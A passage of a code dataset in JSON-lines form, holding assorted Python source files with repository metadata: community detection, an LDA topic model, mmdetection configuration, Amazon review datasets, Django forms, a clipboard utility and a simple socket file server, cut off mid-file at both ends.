2\n\n phiHuyghens = -1 * (inertieTot + distanceToCenterOfGravity) / N\n # if(args.verbose):\n # print(\"# phiHuyghens(\" + str(node) + \") = \" + str(phiHuyghens))\n self.degrees[count] = phiHuyghens\n self.gdegrees[node] = phiHuyghens\n self.loops[node] = 0\n self.internals[count] = self.loops[node]\n count = count + 1\n\n def inducedAttribStatusTab(self, node2com, bijection):\n # if(args.verbose):\n # print(self)\n retrobijection = {}\n for k, v in bijection.items():\n retrobijection[v] = k\n self.node2com = dict([])\n oldDegrees = self.degrees\n oldInternals = self.internals\n\n self.degrees = dict([])\n self.gdegrees = dict([])\n self.internals = dict([])\n self.node2com = dict([])\n self.loops = dict([])\n\n for node in retrobijection:\n self.node2com[node] = node\n deg = oldDegrees[retrobijection[node]]\n self.degrees[node] = deg\n self.gdegrees[node] = deg\n self.loops[node] = oldInternals[retrobijection[node]]\n self.internals[node] = self.loops[node]\n\n def init(self, graph):\n \"\"\"Initialize the status of a graph with every node in one community\"\"\"\n count = 0\n self.node2com = dict([])\n self.degrees = dict([])\n self.gdegrees = dict([])\n self.internals = dict([])\n self.total_weight = graph.size(weight=\"weight\")\n for node in sorted(graph.nodes()):\n self.node2com[node] = count\n deg = float(graph.degree(node, weight=\"weight\"))\n self.degrees[count] = deg\n self.gdegrees[node] = deg\n self.loops[node] = float(\n graph.get_edge_data(node, node, {\"weight\": 0}).get(\"weight\", 1)\n )\n self.internals[count] = self.loops[node]\n count = count + 1\n\n\ndef loadDataset(path):\n graph = nx.Graph()\n\n # Read the graph\n if not os.path.isfile(path + \".edgeList\"):\n print(\"Error: file '\" + path + \".edgeList' not found\")\n exit(-1)\n with open(path + \".edgeList\") as f:\n for line in f.readlines():\n v1 = int(line.split(\" \")[0])\n v2 = int(line.split(\" \")[1])\n graph.add_node(v1)\n graph.add_node(v2)\n graph.add_edge(v1, v2)\n\n # Read the attributes\n attributes = {}\n for n in graph:\n attributes[n] = {}\n\n if not os.path.isfile(path + \".attributes\"):\n print(\"Error: file '\" + path + \".attributes' not found\")\n exit(-1)\n\n with open(path + \".attributes\") as f:\n for line in f.readlines():\n vertexId = int(line.split(\" \")[0])\n elems = line.split(\" \")[1].split(\",\")\n i = 0\n attrValues = {}\n for attrValue in elems:\n attrValues[i] = float(attrValue)\n i = i + 1\n attributes[vertexId] = attrValues\n\n # Build authorIndex\n authorIndex = {}\n for n in graph:\n authorIndex[n] = n\n\n # if(args.verbose):\n # print(\"# Finished reading dataset\")\n if os.path.exists(path + \".2ModLouvain\"):\n os.remove(path + \".2ModLouvain\")\n\n return graph, attributes, authorIndex\n","repo_name":"GiulioRossetti/cdlib","sub_path":"cdlib/algorithms/internal/ILouvain.py","file_name":"ILouvain.py","file_ext":"py","file_size_in_byte":17301,"program_lang":"python","lang":"en","doc_type":"code","stars":328,"dataset":"github-code","pt":"84"} +{"seq_id":"42578462692","text":"import logging\nfrom copy import deepcopy\n\n#logger = logging.getLogger('segmentation')\n\nclass Config:\n \"\"\"\n Stores the content of config.ini using deepcopy(without changing the source)\n \"\"\"\n __config = {}\n\n @staticmethod\n def get(name):\n \"\"\"\n Returns the value of given name\n \n Args:\n name (str): key of specific value in dictionay(which stores config settings).\n \n Returns:\n The deep copy of the value from dictionary using the given key(name).\n \n Raises:\n KeyError: If the confi setting doesn't exist.\n \"\"\"\n try:\n return deepcopy(Config.__config[name])\n except KeyError:\n #logger.warning(\"Config setting \" + name + \"not found.\")\n return\n \n @staticmethod\n def set(name, value):\n \"\"\"\n Sets the value of specific config setting\n Args:\n name (string): Name of config setting (key in dictionary).\n value (str/int/bool/float/Path): \n \"\"\"\n try:\n Config.__config[name] = deepcopy(value)\n except:\n Config.__config[name] = value","repo_name":"abdulqadirs/table-extraction","sub_path":"deep-splitting-merging/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"84"} +{"seq_id":"9342170454","text":"# This script takes marks the existing text content of a Windows\n# clipboard as HTML. This is useful to automate copy/paste of\n# the formatted code from gVIM to Outlook, blog post, etc.\n\n# Clipboard stuff from http://code.activestate.com/recipes/474121/\n\nimport re\nimport win32clipboard\n\nclass HtmlClipboard:\n\n CF_HTML = None\n\n MARKER_BLOCK_OUTPUT = \\\n \"Version:1.0\\r\\n\" \\\n \"StartHTML:%09d\\r\\n\" \\\n \"EndHTML:%09d\\r\\n\" \\\n \"StartFragment:%09d\\r\\n\" \\\n \"EndFragment:%09d\\r\\n\" \\\n \"StartSelection:%09d\\r\\n\" \\\n \"EndSelection:%09d\\r\\n\" \\\n \"SourceURL:%s\\r\\n\"\n\n MARKER_BLOCK_EX = \\\n \"Version:(\\S+)\\s+\" \\\n \"StartHTML:(\\d+)\\s+\" \\\n \"EndHTML:(\\d+)\\s+\" \\\n \"StartFragment:(\\d+)\\s+\" \\\n \"EndFragment:(\\d+)\\s+\" \\\n \"StartSelection:(\\d+)\\s+\" \\\n \"EndSelection:(\\d+)\\s+\" \\\n \"SourceURL:(\\S+)\"\n MARKER_BLOCK_EX_RE = re.compile(MARKER_BLOCK_EX)\n\n MARKER_BLOCK = \\\n \"Version:(\\S+)\\s+\" \\\n \"StartHTML:(\\d+)\\s+\" \\\n \"EndHTML:(\\d+)\\s+\" \\\n \"StartFragment:(\\d+)\\s+\" \\\n \"EndFragment:(\\d+)\\s+\" \\\n \"SourceURL:(\\S+)\"\n MARKER_BLOCK_RE = re.compile(MARKER_BLOCK)\n\n DEFAULT_HTML_BODY = \\\n \"\" \\\n \"%s\"\n\n def __init__(self):\n self.html = None\n self.fragment = None\n self.selection = None\n self.source = None\n self.htmlClipboardVersion = None\n\n\n def GetCfHtml(self):\n \"\"\"\n Return the FORMATID of the HTML format\n \"\"\"\n if self.CF_HTML is None:\n self.CF_HTML = win32clipboard.RegisterClipboardFormat(\"HTML Format\")\n\n return self.CF_HTML\n\n\n def GetFromClipboard(self):\n \"\"\"\n Read and decode the HTML from the clipboard\n \"\"\"\n\n try:\n win32clipboard.OpenClipboard(0)\n src = win32clipboard.GetClipboardData(self.GetCfHtml())\n self.DecodeClipboardSource(src)\n finally:\n win32clipboard.CloseClipboard()\n\n\n def PutFragment(self, fragment, selection=None, html=None, source=None):\n \"\"\"\n Put the given well-formed fragment of Html into the clipboard.\n\n selection, if given, must be a literal string within fragment.\n html, if given, must be a well-formed Html document that textually\n contains fragment and its required markers.\n \"\"\"\n if selection is None:\n selection = fragment\n if html is None:\n html = self.DEFAULT_HTML_BODY % fragment\n if source is None:\n source = \"file://cliphtml.vim\"\n\n fragmentStart = html.index(fragment)\n fragmentEnd = fragmentStart + len(fragment)\n selectionStart = html.index(selection)\n selectionEnd = selectionStart + len(selection)\n self.PutToClipboard(html, fragmentStart, fragmentEnd, selectionStart, selectionEnd, source)\n\n\n def PutToClipboard(self, html, fragmentStart, fragmentEnd, selectionStart, selectionEnd, source=\"None\"):\n \"\"\"\n Replace the Clipboard contents with the given html information.\n \"\"\"\n\n try:\n win32clipboard.OpenClipboard(0)\n win32clipboard.EmptyClipboard()\n src = self.EncodeClipboardSource(html, fragmentStart, fragmentEnd, selectionStart, selectionEnd, source)\n #print src\n win32clipboard.SetClipboardData(self.GetCfHtml(), src)\n finally:\n win32clipboard.CloseClipboard()\n\n\n def EncodeClipboardSource(self, html, fragmentStart, fragmentEnd, selectionStart, selectionEnd, source):\n \"\"\"\n Join all our bits of information into a string formatted as per the HTML format specs.\n \"\"\"\n # How long is the prefix going to be?\n dummyPrefix = self.MARKER_BLOCK_OUTPUT % (0, 0, 0, 0, 0, 0, source)\n lenPrefix = len(dummyPrefix)\n\n prefix = self.MARKER_BLOCK_OUTPUT % (lenPrefix, len(html)+lenPrefix,\n fragmentStart+lenPrefix, fragmentEnd+lenPrefix,\n selectionStart+lenPrefix, selectionEnd+lenPrefix,\n source)\n return (prefix + html)\n\n\n# Get the (assumedly) HTML code from the clipboard, as text\nwin32clipboard.OpenClipboard(0)\ntext = win32clipboard.GetClipboardData()\n\n# Put it back on the clipboard, now marking as HTML\nHtmlClipboard().PutFragment(text)\n","repo_name":"glexey/vim_html_paste","sub_path":"clip2html.py","file_name":"clip2html.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33148702735","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n \"\"\"\n Cyclic iteration.\n\n Form a virtual cycle from each list, by connecting the tail of list A\n to the head of list B. Assuming list A's part1 has x length, list B's\n part1 has y length, and the shared part has z length.\n Then node a would traverse (x + y + z) length, and same for node b, so\n they will meet at the intersection.\n If there is no itersection, they will meet at 'None'.\n The key here is to step through 'None' as a Node.\n\n Time: O(n + m) where n and m is the length of two lists, respectively\n Space: O(1)\n \"\"\"\n a, b = headA, headB\n while a != b:\n a = a.next if a else headB\n b = b.next if b else headA\n return a","repo_name":"hukun01/LeetCode","sub_path":"easy/160. Intersection of Two Linked Lists.py","file_name":"160. Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"18078260186","text":"import socket\n\nhost: str = \"localhost\"\nport: int = 5000\n\nmy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET -> IP4\n\nmy_socket.bind((host, port))\nmy_socket.listen(1)\nprint(\"Server is listening on port:\", str(port))\nconnection, address = my_socket.accept()\n\nfile_name: str = connection.recv(1024).decode()\n\ntry:\n file = open(file_name, \"rb\")\n content = file.read()\n connection.send(content)\n file.close()\nexcept FileNotFoundError:\n print(\"File does not exist\")\n connection.send(\"File does not exist\".encode())\n\nconnection.close()\n","repo_name":"DanielW1987/python-basics","sub_path":"python_013_networking/socket/FileServer.py","file_name":"FileServer.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33507126326","text":"from mmdet.utils import (replace_cfg_vals, setup_multi_processes, update_data_root)\nfrom mmdet.utils import (collect_env, get_root_logger, get_device, compat_cfg)\nfrom mmdet.apis import init_random_seed, set_random_seed\nfrom mmdet.datasets import replace_ImageToTensor\nfrom dataclasses import dataclass, field\nfrom dotenv import load_dotenv\nfrom mmcv import Config\nimport os.path as osp\nimport time\nimport mmcv\nimport os\n\nload_dotenv()\n\n\n@dataclass\nclass Configuration:\n base_file: dict\n config_file: str = field(default=None)\n cfg: Config = field(default=None)\n device: str = field(default=\"cpu\")\n batch_size: str = field(default=64)\n\n def __post_init__(self):\n self.config_file = f\"\"\"{os.getenv(\"CONFIG_PATH\")}/{self.base_file[\"name\"]}/{self.base_file[\"fine_tune\"][\"name\"]}.py\"\"\"\n self.cfg = Config.fromfile(self.config_file)\n\n self.cfg.load_from = self.base_file[\"fine_tune\"][\"load_from\"]\n self.cfg.work_dir = f\"\"\"{os.getenv(\"WORK_DIR\")}/{self.base_file[\"name\"]}/{self.base_file[\"version\"\n ]}/{self.base_file[\"datasets\"][\"name\"]}/{self.base_file[\"iteration\"]}/{self.base_file[\"datasets\"][\"fold\"]}\"\"\"\n\n self.config_dataset(self.cfg.dataset_type)\n\n self.cfg = replace_cfg_vals(self.cfg)\n self.cfg.device = os.getenv(\"DEVICE\")\n self.device = os.getenv(\"DEVICE\")\n\n # update data root according to MMDET_DATASETS\n update_data_root(self.cfg)\n\n # set multi-process settings\n setup_multi_processes(self.cfg)\n\n self.cfg.optimizer.lr = self.base_file[\"optimizer\"][\"lr\"]\n self.cfg.optimizer.momentum = self.base_file[\"optimizer\"][\"momentum\"]\n\n self.cfg.checkpoint_config.interval = self.base_file[\"optimizer\"][\"interval\"]\n\n mmcv.mkdir_or_exist(osp.abspath(self.cfg.work_dir))\n\n # Set random seed for reproducible results.\n seed = init_random_seed(0, device=self.cfg.device)\n set_random_seed(seed)\n self.cfg.seed = seed\n self.cfg.runner.max_epochs = self.base_file[\"runner\"][\"max_epochs\"]\n\n # dump config\n self.cfg.dump(osp.join(self.cfg.work_dir, osp.basename(self.config_file)))\n\n def config_dataset(self, dataset_type: str = \"voc\"):\n if \"voc\" in dataset_type.lower():\n self.cfg.dataset_type = \"VOCDataset\"\n dataset_type = \"voc\"\n elif \"coco\" in dataset_type.lower():\n self.cfg.dataset_type = \"CocoDataset\"\n dataset_type = \"coco\"\n\n data_path = self.base_file[\"datasets\"][\"paths\"][dataset_type]\n self.cfg.data.train.ann_file = data_path[\"train\"][\"ann_file\"]\n self.cfg.data.train.img_prefix = data_path[\"train\"][\"img_prefix\"]\n\n self.cfg.data.val.type = self.cfg.dataset_type\n self.cfg.data.val.ann_file = data_path[\"val\"][\"ann_file\"]\n self.cfg.data.val.img_prefix = data_path[\"val\"][\"img_prefix\"]\n\n self.cfg.data.test.type = self.cfg.dataset_type\n self.cfg.data.test.ann_file = data_path[\"test\"][\"ann_file\"]\n self.cfg.data.test.img_prefix = data_path[\"test\"][\"img_prefix\"]\n\n if self.cfg.data.train.type == \"MultiImageMixDataset\":\n if \"classes\" in self.cfg.data.train:\n self.cfg.data.train.pop(\"classes\")\n self.cfg.data.train.pop(\"ann_file\")\n self.cfg.data.train.pop(\"img_prefix\")\n\n self.cfg.data.train.dataset.type = self.cfg.dataset_type\n self.cfg.data.train.dataset.ann_file = data_path[\"train\"][\"ann_file\"]\n self.cfg.data.train.dataset.img_prefix = data_path[\"train\"][\"img_prefix\"]\n else:\n self.cfg.data.train.type = self.cfg.dataset_type\n\n def load_config_for_train(self) -> dict:\n timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n log_file = osp.join(self.cfg.work_dir, f'{timestamp}.log')\n logger = get_root_logger(log_file=log_file, log_level=self.cfg.log_level)\n\n # init the meta dict to record some important information such as\n # environment info and seed, which will be logged\n meta = dict()\n\n self.cfg.data.workers_per_gpu = int(self.base_file[\"workers\"])\n self.cfg.data.samples_per_gpu = int(self.base_file[\"workers\"])\n\n # log env info\n env_info_dict = collect_env()\n env_info = '\\n'.join([f'{k}: {v}' for k, v in env_info_dict.items()])\n dash_line = '-' * 60 + '\\n'\n logger.info('Environment info:\\n' + dash_line + env_info + '\\n' + dash_line)\n\n meta['env_info'] = env_info\n meta['config'] = self.cfg.pretty_text\n\n # log some basic info\n logger.info(f'Distributed training: {False}')\n logger.info(f'Config:\\n{self.cfg.pretty_text}')\n\n # set random seeds\n meta['seed'] = self.cfg.seed\n\n return {\n \"cfg\": self.cfg,\n \"timestamp\": timestamp,\n \"meta\": meta\n }\n\n def load_config_for_test(self, dataset_type: str = \"voc\") -> Config:\n self.cfg = replace_cfg_vals(self.cfg)\n self.config_dataset(dataset_type)\n\n # update data root according to MMDET_DATASETS\n update_data_root(self.cfg)\n self.cfg = compat_cfg(self.cfg)\n\n if 'pretrained' in self.cfg.model:\n self.cfg.model.pretrained = None\n elif 'init_cfg' in self.cfg.model.backbone:\n self.cfg.model.backbone.init_cfg = None\n\n if self.cfg.model.get('neck'):\n if isinstance(self.cfg.model.neck, list):\n for neck_cfg in self.cfg.model.neck:\n if neck_cfg.get('rfp_backbone'):\n if neck_cfg.rfp_backbone.get('pretrained'):\n neck_cfg.rfp_backbone.pretrained = None\n elif self.cfg.model.neck.get('rfp_backbone'):\n if self.cfg.model.neck.rfp_backbone.get('pretrained'):\n self.cfg.model.neck.rfp_backbone.pretrained = None\n\n self.cfg.device = get_device()\n self.cfg.data.test_dataloader.samples_per_gpu = int(self.base_file[\"workers\"])\n self.cfg.data.test_dataloader.workers_per_gpu = int(self.base_file[\"workers\"])\n\n if isinstance(self.cfg.data.test, dict):\n self.cfg.data.test.test_mode = True\n if self.cfg.data.test_dataloader.get('samples_per_gpu', 1) > 1:\n # Replace 'ImageToTensor' to 'DefaultFormatBundle'\n self.cfg.data.test.pipeline = replace_ImageToTensor(self.cfg.data.test.pipeline)\n elif isinstance(self.cfg.data.test, list):\n for ds_cfg in self.cfg.data.test:\n ds_cfg.test_mode = True\n if self.cfg.data.test_dataloader.get('samples_per_gpu', 1) > 1:\n for ds_cfg in self.cfg.data.test:\n ds_cfg.pipeline = replace_ImageToTensor(ds_cfg.pipeline)\n\n return self.cfg\n","repo_name":"AFKaro/SARDeep","sub_path":"src/infra/configs/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"21336076148","text":"import numpy as np\nimport codecs\nimport jieba\nimport re\nimport random\nimport math\nfrom scipy.special import psi\n\n# itemIdList : the list of distinct terms in the document\n# itemCountList : the list of number of the existence of corresponding terms\n# wordCount : the number of total words (not terms)\nclass Document:\n def __init__(self, itemIdList, itemCountList, wordCount):\n self.itemIdList = itemIdList\n self.itemCountList = itemCountList\n self.wordCount = wordCount\n\n# preprocessing (segmentation, stopwords filtering, represent documents as objects of class Document)\ndef preprocessing():\n \n # read the list of stopwords\n file = codecs.open('stopwords.dic','r','utf-8')\n stopwords = [line.strip() for line in file]\n file.close()\n \n # read the corpus for training\n file = codecs.open('dataset.txt','r','utf-8')\n documents = [document.strip() for document in file] \n file.close()\n \n docs = []\n word2id = {}\n id2word = {}\n \n currentWordId = 0\n for document in documents:\n word2Count = {}\n # segmentation\n segList = jieba.cut(document)\n for word in segList: \n word = word.lower().strip()\n # filter the stopwords\n if len(word) > 1 and not re.search('[0-9]', word) and word not in stopwords:\n if word not in word2id:\n word2id[word] = currentWordId\n id2word[currentWordId] = word\n currentWordId += 1\n if word in word2Count:\n word2Count[word] += 1\n else:\n word2Count[word] = 1\n itemIdList = []\n itemCountList = []\n wordCount = 0\n\n for word in word2Count.keys():\n itemIdList.append(word2id[word])\n itemCountList.append(word2Count[word])\n wordCount += word2Count[word]\n\n docs.append(Document(itemIdList, itemCountList, wordCount))\n\n return docs, word2id, id2word\n \ndef maxItemNum():\n num = 0\n for d in range(0, N):\n if len(docs[d].itemIdList) > num:\n num = len(docs[d].itemIdList)\n return num\n\ndef initialLdaModel():\n for z in range(0, K):\n for w in range(0, M):\n nzw[z, w] += 1.0/M + random.random()\n nz[z] += nzw[z, w]\n updateVarphi() \n\n# update model parameters : varphi (the update of alpha is ommited)\ndef updateVarphi():\n for z in range(0, K):\n for w in range(0, M):\n if(nzw[z, w] > 0):\n varphi[z, w] = math.log(nzw[z, w]) - math.log(nz[z])\n else:\n varphi[z, w] = -100\n\n# update variational parameters : gamma and phi\ndef variationalInference(docs, d, gamma, phi):\n phisum = 0\n oldphi = np.zeros([K])\n digamma_gamma = np.zeros([K])\n \n for z in range(0, K):\n gamma[d][z] = alpha + docs[d].wordCount * 1.0 / K\n digamma_gamma[z] = psi(gamma[d][z])\n for w in range(0, len(docs[d].itemIdList)):\n phi[w, z] = 1.0 / K\n\n for iteration in range(0, iterInference):\n for w in range(0, len(docs[d].itemIdList)):\n phisum = 0\n for z in range(0, K):\n oldphi[z] = phi[w, z]\n phi[w, z] = digamma_gamma[z] + varphi[z, docs[d].itemIdList[w]]\n if z > 0:\n phisum = math.log(math.exp(phisum) + math.exp(phi[w, z]))\n else:\n phisum = phi[w, z]\n for z in range(0, K):\n phi[w, z] = math.exp(phi[w, z] - phisum)\n gamma[d][z] = gamma[d][z] + docs[d].itemCountList[w] * (phi[w, z] - oldphi[z])\n digamma_gamma[z] = psi(gamma[d][z])\n\n\n# calculate the gamma parameter of new document\ndef inferTopicOfNewDocument():\n testDocs = []\n # read the corpus to be inferred\n file = codecs.open('infer.txt','r','utf-8')\n testDocuments = [document.strip() for document in file] \n file.close()\n \n for d in range(0, len(testDocuments)):\n document = testDocuments[d]\n word2Count = {}\n # segmentation\n segList = jieba.cut(document)\n for word in segList: \n word = word.lower().strip()\n if word in word2id:\n if word in word2Count:\n word2Count[word] += 1\n else:\n word2Count[word] = 1\n \n itemIdList = []\n itemCountList = []\n wordCount = 0\n\n for word in word2Count.keys():\n itemIdList.append(word2id[word])\n itemCountList.append(word2Count[word])\n wordCount += word2Count[word]\n\n testDocs.append(Document(itemIdList, itemCountList, wordCount))\n \n gamma = np.zeros([len(testDocuments), K])\n for d in range(0, len(testDocs)):\n phi = np.zeros([len(testDocs[d].itemIdList), K])\n variationalInference(testDocs, d, gamma, phi)\n \n return gamma\n \ndocs, word2id, id2word = preprocessing() \n\n \n# number of documents for training\nN = len(docs)\n# number of distinct terms\nM = len(word2id)\n# number of topic\nK = 10\n# iteration times of variational inference, judgment of the convergence by calculating likelihood is ommited\niterInference = 20 \n# iteration times of variational EM algorithm, judgment of the convergence by calculating likelihood is ommited\niterEM = 20\n\n# initial value of hyperparameter alpha\nalpha = 5\n# sufficient statistic of alpha\nalphaSS = 0\n# the topic-word distribution (beta in D. Blei's paper)\nvarphi = np.zeros([K, M])\n# topic-word count, this is a sufficient statistic to calculate varphi\nnzw = np.zeros([K, M])\n# topic count, sum of nzw with w ranging from [0, M-1], for calculating varphi\nnz = np.zeros([K])\n\n# inference parameter gamma\ngamma = np.zeros([N, K])\n# inference parameter phi\nphi = np.zeros([maxItemNum(), K])\n\n# initialization of the model parameter varphi, the update of alpha is ommited\ninitialLdaModel()\n\n# variational EM Algorithm\nfor iteration in range(0, iterEM): \n nz = np.zeros([K])\n nzw = np.zeros([K, M])\n alphaSS = 0\n # E-Step\n for d in range(0, N):\n variationalInference(docs, d, gamma, phi)\n gammaSum = 0\n for z in range(0, K):\n gammaSum += gamma[d, z]\n alphaSS += psi(gamma[d, z])\n alphaSS -= K * psi(gammaSum)\n\n for w in range(0, len(docs[d].itemIdList)):\n for z in range(0, K):\n nzw[z][docs[d].itemIdList[w]] += docs[d].itemCountList[w] * phi[w, z]\n nz[z] += docs[d].itemCountList[w] * phi[w, z]\n\n # M-Step\n updateVarphi()\n\n# calculate the top 10 terms of each topic\ntopicwords = []\nmaxTopicWordsNum = 10\nfor z in range(0, K):\n\tids = varphi[z, :].argsort()\n\ttopicword = []\n\tfor j in ids:\n\t\ttopicword.insert(0, id2word[j])\n\ttopicwords.append(topicword[0 : min(10, len(topicword))])\n\n# infer the topic of each new document\ninferGamma = inferTopicOfNewDocument()\ninferZ = []\nfor i in range(0, len(inferGamma)):\n inferZ.append(inferGamma[i, :].argmax())\n","repo_name":"laserwave/lda_variational_em","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"84"} +{"seq_id":"20701663941","text":"from torch.utils.data import Dataset\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nimport numpy as np\nimport torch\n\n\nclass AmazonText(Dataset):\n def __init__(self, w2v, path='balanced_stemmed_amazon_50k.csv'):\n super(AmazonText, self).__init__()\n self.w2v = w2v\n self.df = pd.read_csv(path, sep='\\t')\n self.df = self.df[~self.df['reviewText'].isnull()]\n self.text = self.df['reviewText'].values\n self.text = self.text[2000:]\n self.labels = self.df['overall'].apply(\n lambda x: 0. if x <= 2.5 else 1.).values\n self.tfidf = TfidfVectorizer(\n min_df=0, lowercase=False, token_pattern=r\"([^\\s]+|[:=;][o0\\-]?[D\\)\\]\\(\\]/\\\\OpP])\").fit(self.text)\n\n def __len__(self):\n return self.text.shape[0]\n\n def __getitem__(self, idx):\n # TODO:Here, when unknown word is met, we replace it by zeros(which might represent a word with a meaning,\n # it is necessary to replace unknown wrds by a specific token so that representation isn't biased., to be added in preprocessing phase)\n t = self.text[idx]\n label = self.labels[idx]\n output = text2vec(t, self.w2v, tfidf=self.tfidf)\n dic = {'w2v': output, 'label': torch.Tensor([label]), 'text': t}\n return dic\n\n\nclass AmazonTextRecurrent(Dataset):\n def __init__(self, w2v, max_len=None, path='stemmed_amazon_500k_train.csv', preprocessor=None, stemmer=None):\n super(AmazonTextRecurrent, self).__init__()\n self.preprocessor = preprocessor\n self.stemmer = stemmer\n self.w2v = w2v\n self.df = pd.read_csv(path, sep='\\t')\n self.df = self.df[~self.df['reviewText'].isnull()]\n self.df = self.df.reset_index()\n self.text = self.df['reviewText'].values\n self.labels = self.df['overall'].apply(lambda x: 0. if x <= 2.5 else 1.).values\n if max_len is None:\n self.max_len = max([len(t.split(' ')) for t in self.text])\n else:\n self.max_len = max_len\n\n def __len__(self):\n return self.text.shape[0]\n\n def __getitem__(self, idx):\n t = self.text[idx]\n label = self.labels[idx]\n\n if self.preprocessor is not None:\n t = self.preprocessor(t, stemmer=self.stemmer)\n\n output = text2matrix(t, self.w2v, max_len=self.max_len)\n dic = {'w2v': output, 'label': torch.Tensor([float(label)]*30), 'text': t}\n return dic\n\n\ndef text2matrix(text, w2v, max_len=None):\n text = text.split(' ')\n if max_len is None:\n max_len = len(text)\n matrix = torch.zeros((max_len, w2v.vector_size))\n i = 0\n j = 0\n while j < len(text) and i < max_len:\n try:\n matrix[i, :] = torch.Tensor(w2v[text[j]])\n i += 1\n except KeyError:\n pass\n j += 1\n return matrix\n\n\ndef text2vec(text, w2v, tfidf=None):\n output = torch.zeros(w2v.vector_size)\n text = text\n if tfidf is not None:\n tfidf_t = tfidf.transform([text])\n tfidfs = []\n for i, word in enumerate(text.split(' ')):\n try:\n if len(word) > 1:\n tfidfs += [tfidf_t[0, tfidf.vocabulary_[word]]]\n else:\n tfidfs += [0.]\n except KeyError:\n pass\n\n for i, word in enumerate(text.split(' ')):\n try:\n if len(word) > 1 and tfidf is not None:\n output += torch.Tensor(w2v.wv[word]) * torch.Tensor([tfidfs[i]])\n elif tfidf is None:\n output += torch.Tensor(w2v.wv[word])\n except KeyError:\n pass\n if torch.sum(output) != 0:\n output = output / torch.norm(output)\n return output\n\n\ndef split_ids(dataset, test_size=.2, shuffle=True, seed=0):\n length = len(dataset)\n indices = list(range(length))\n\n if shuffle is True:\n import random\n random.seed(seed)\n random.shuffle(indices)\n\n if type(test_size) is float:\n split = int(test_size * length)\n elif type(test_size) is int:\n split = test_size\n else:\n raise ValueError('%s should be an int or a float' % str)\n return indices[split:], indices[:split]\n\n\ndef build_name(string, w2v_size, n_hidden, stemmer):\n import time\n if stemmer is None:\n model_name = 'models/{}_{}_{}_no_stem_{}.model'.format(string, n_hidden, w2v_size, time.strftime('%d%b_%X'))\n else:\n model_name = 'models/{}_{}_{}_stem_{}.model'.format(string, n_hidden, w2v_size, time.strftime('%d%b_%X'))\n return model_name\n","repo_name":"lgestin/TransferLearning","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"13022892163","text":"from crispy_bootstrap5.bootstrap5 import FloatingField\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Div, Layout, Submit\nfrom django import forms\nfrom django.contrib.auth.forms import UserChangeForm, UserCreationForm\nfrom django.urls import reverse_lazy\n\nfrom .models import CustomUser, Profile\n\n\nclass CustomUserCreationForm(UserCreationForm):\n class Meta:\n model = CustomUser\n fields = (\"username\", \"email\")\n\n\nclass CustomUserChangeForm(UserChangeForm):\n class Meta:\n model = CustomUser\n fields = (\"username\", \"email\")\n\n\nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = (\"first_name\", \"last_name\")\n\n def __init__(self, *args, **kwargs):\n self.pk = kwargs.pop(\"pk\")\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.attrs = {\n \"hx-post\": reverse_lazy(\"accounts:profile_edit\", kwargs={\"pk\": self.pk}),\n }\n self.helper.disable_csrf = True\n self.helper.layout = Layout(\n FloatingField(\"first_name\"),\n FloatingField(\"last_name\"),\n Div(\n Submit(\"submit\", \"Salva\"),\n css_class=\"d-grid\",\n ),\n )\n","repo_name":"applewebbo/familytrip","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"36637030175","text":"import os\r\nimport re\r\nimport csv\r\nimport nltk\r\nimport pandas as pd\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.probability import FreqDist\r\n\r\n\r\ndata_path = os.path.join(os.path.dirname(__file__),\"Cleaned_Data.csv\")\r\nsave_path = os.path.join(os.path.dirname(__file__),\"Word_Cloud.csv\")\r\nsave_path1 = os.path.join(os.path.dirname(__file__),\"Unique_Cloud.csv\")\r\ndata = pd.read_csv(data_path)\r\n\r\nword = \"\"\r\nword_ls = []\r\nfor n,i in enumerate(data[\"Content of Post\"]):\r\n word+=i\r\n word_ls+=word_tokenize(i)\r\n if(n%1000==0):\r\n print(\"Creating Bag of Words...@\",n)\r\n\r\nprint(\"----------------------------------Completed---------------------------------\")\r\nuniq_ls = list(set(word_ls))\r\nprint(len(word_ls))\r\nunique_list = list(dict.fromkeys(word_ls))\r\nprint(len(unique_list))\r\nprint(len(uniq_ls))\r\n \r\nfre = FreqDist()\r\nufre = FreqDist()\r\nfor i in word_ls:\r\n fre[i.capitalize()]+=1\r\n\r\nfor i in uniq_ls:\r\n ufre[i.capitalize()]+=1\r\n\r\nprint(\"Frequency Generated\")\r\n\r\n# pss=[]\r\n# for key in fre.keys():\r\n# poss = nltk.pos_tag(key)\r\n# print(poss[0][1])\r\n# if(poss[0][1] not in pss):\r\n# pss.append(poss[0][1])\r\n\r\npss = ['NNP', 'PRP', 'DT', 'NN', 'VB', 'IN', 'CD', 'WRB', 'SYM', '$', 'RB']\r\nwith open(save_path, 'w') as f:\r\n for key in fre.keys():\r\n try:\r\n 